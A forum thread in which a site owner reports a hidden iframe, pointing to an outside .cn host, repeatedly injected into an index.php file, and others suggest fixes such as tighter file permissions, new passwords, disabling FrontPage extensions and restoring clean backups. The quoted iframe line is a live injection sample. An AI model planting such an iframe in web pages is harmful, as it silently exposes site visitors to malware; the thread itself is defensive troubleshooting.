I have a question. somebody is adding this kind of code to one of my sites <iframe src="http://namegamestore.cn:8080/index.php" width=164 height=131 style="visibility: hidden"></iframe> This has been added to my index.php file. I contacted my hosting and they suggested me to change the passwords, wich I did, the problem is I am still having the same situation. Do you have any suggestions?
In cPanel try not to give access to anonymous ftp and change the folder permissions to 755 and file permissions to 644 and change your ftp password.
You need to figure out how they are getting into your site and plug the hole. Quite likely a vulnerable script of some kind. I hope you have a secure backup because once you are hacked there is no telling what all they might have added.
One of my clients was seeing this show up over and over on their website. We contacted the hosting provider and got their help to disable all Frontpage extensions. That helped. But we also changed all passwords and restored files from a clean backup. Honestly I don't even know why Frontpage extension were even an option because we don't do anything with Expression Web or Frontpage. Check your file manager to see if there are any subdirectories like _vti or if there are special settings for Frontpage. If you don't use it either, then make sure it has been removed or disabled.
A quick Google pulls this up as well: http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-prevalent/ Looks like part of the attack is local with a virus of some sort.